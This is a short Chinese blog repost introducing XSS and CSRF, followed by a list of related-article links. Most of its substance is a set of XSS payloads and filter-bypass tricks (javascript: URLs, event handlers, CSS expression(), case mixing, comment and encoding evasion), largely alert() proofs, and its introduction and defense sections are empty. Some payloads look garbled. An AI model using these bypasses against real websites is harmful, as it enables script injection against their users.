Xss Csrf 简介
一、Js在web的执行环境
1.直接触发
<script language=“javascript”>
document.write(“hello world!”);
</script>
<script language=“javascript” src=“test.js”>
</script>
2.利用HTML标签属性触发
•利用HTML标签中能够访问文件的属性来执行JS代码。JS中包含一个URL伪协议,可以使用javascript:加上任意JS代码来表示一个URL,浏览器装载此URL时,JS被执行。
< img src=“javascript:alert(‘XSS’)” />
< img dynsrc=“javascript:alert(‘XSS’)” />
<img src=“#” οnerrοr=“alert(‘XSS’)” />
<img onClick =“alert(‘XSS’)” />
1)以.css文件的形式:
<link href=“test.css” rel=“stylesheet” type=“text/css”/>
2)以<style></style>标签的方式:
< style type="text/javascript">alert('XSS');</ style >
3)在标签中以style属性的方式。
<a style ="background-image: url(javascript:alert('XSS'))"> </a>
<style>
h1{color:#CCC;height:expression(alert(‘xss’));}
</style>
二、Xss的介绍
三、XSS挖掘技巧
<img src=“javascript:alert(‘XSS’)” />
写为<img src=“JavasCripT:alert(‘XSS’)” />可绕过过滤规则
如: <img src=“javascript:alert(‘XSS’)” />,混淆后代码为:
<img src=“javascript:alert(‘XSS’)” />
3. 绕过HTML标签内的关键字过滤,在插入代码的属性前加入混淆属性,如: <img src=“abc>” οnclick=“alert(‘XSS’)” />
4. 插入注释符如: <img style=“xss:expr/*xss*/ession(alert(111))”>
5.对CSS:\会被浏览器忽略: : <img style=“background-image:url(ja\vas\\\\cript:alert(111))”>
6.编码绕过,如: <img src=“javascript:alert('XSS'l;”>等价于<img src=“javascript:alert(‘xss’;)”.>
http://ha.ckers.org/xss.html
四、防XSS
转载于:https://www.cnblogs.com/sohold/archive/2013/01/07/2848769.html
Xss Csrf 简介相关推荐
- 网络安全知识之Cross-Site Request Forgery (CSRF) 简介
1 CSRF简介 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在 ...
- XSS CSRF 攻击
XSS CSRF 攻击 XSS:跨站脚本(Cross-site scripting) CSRF:跨站请求伪造(Cross-site request forgery)定义: 跨网站脚本(Cross-si ...
- 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证
目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...
- Web攻防之XSS,CSRF,SQL注入
摘要:对Web服务器的攻击也可以说是形形色色.种类繁多,常见的有挂马.SQL注入.缓冲区溢出.嗅探.利用IIS等针对Webserver漏洞进行攻击.本文结合WEB TOP10漏洞中常见的SQL注入,跨 ...
- XSS,CSRF防范 也是慢慢更
2019独角兽企业重金招聘Python工程师标准>>> xss攻击两种 reflected 和stored 如xss可以获取用户的cookie <script>aler ...
- 吃透浏览器安全(同源限制/XSS/CSRF/中间人攻击)
前言 随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点.在移动互联网时代,特别是前端人员除了传统的 XSS.CSRF 等安全问题之外,又时常遭遇网 ...
- 常见(XSS|CSRF)六大Web安全攻防解析
作者:浪里行舟 前言 在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷.如何才能更好地保护我们的数据?本文主要侧重于分析几种常见的攻击的类型以及防御的方法. 一.XSS ...
- web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
注(以下环境皆是自己在本机搭建,请勿在公网真实操作) 1.注入 1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶 ...
- 常见的前端安全问题(xss / csrf / sql / ddos / cdn...)
目录 1. xss(Cross Site Scripting)跨站脚本攻击 1.1 持久型(存储型)攻击 / 非持久型(反射型)攻击 是什么? 1.2 xss 出现的场景?造成的危害? 1.3 防御 ...
最新文章
- 详解进程的虚拟内存,物理内存,共享内存
- Centos iptables常用命令及设置
- Spring整合junit4实现对方法的测试
- C11标准委员会成员解读C语言新标准
- EverNote第三方API接口测试
- C语言课后习题(69)
- (91)多人投票器(五人投票器)
- 网易云音乐IPO拟至少募30.4亿港元 开售半日已获足额认购
- win11 windows安全中心无法打开
- 公众号平台服务号、订阅号、企业号区别
- python不是内部命令或外部命令,也不是可执行程序解决方案”解决方法
- 两个IP组播综合配置示例
- 自习室 《大学生创新创业课程设计》
- Prometheus技术系列文章——prometheus调研总结
- MU计算机里代表什么,计算器上M+、M-、MU、GT等分别代表意思-mu代表啥
- mysql 免安装版配置
- 特征值与奇异值的对比及应用
- Mac更新系统后,无法正常打开AE的解决办法
- [推断统计] 求区间估计:枢轴量法
- org.apache.shiro.session.ExpiredSessionException: Session with id异常排查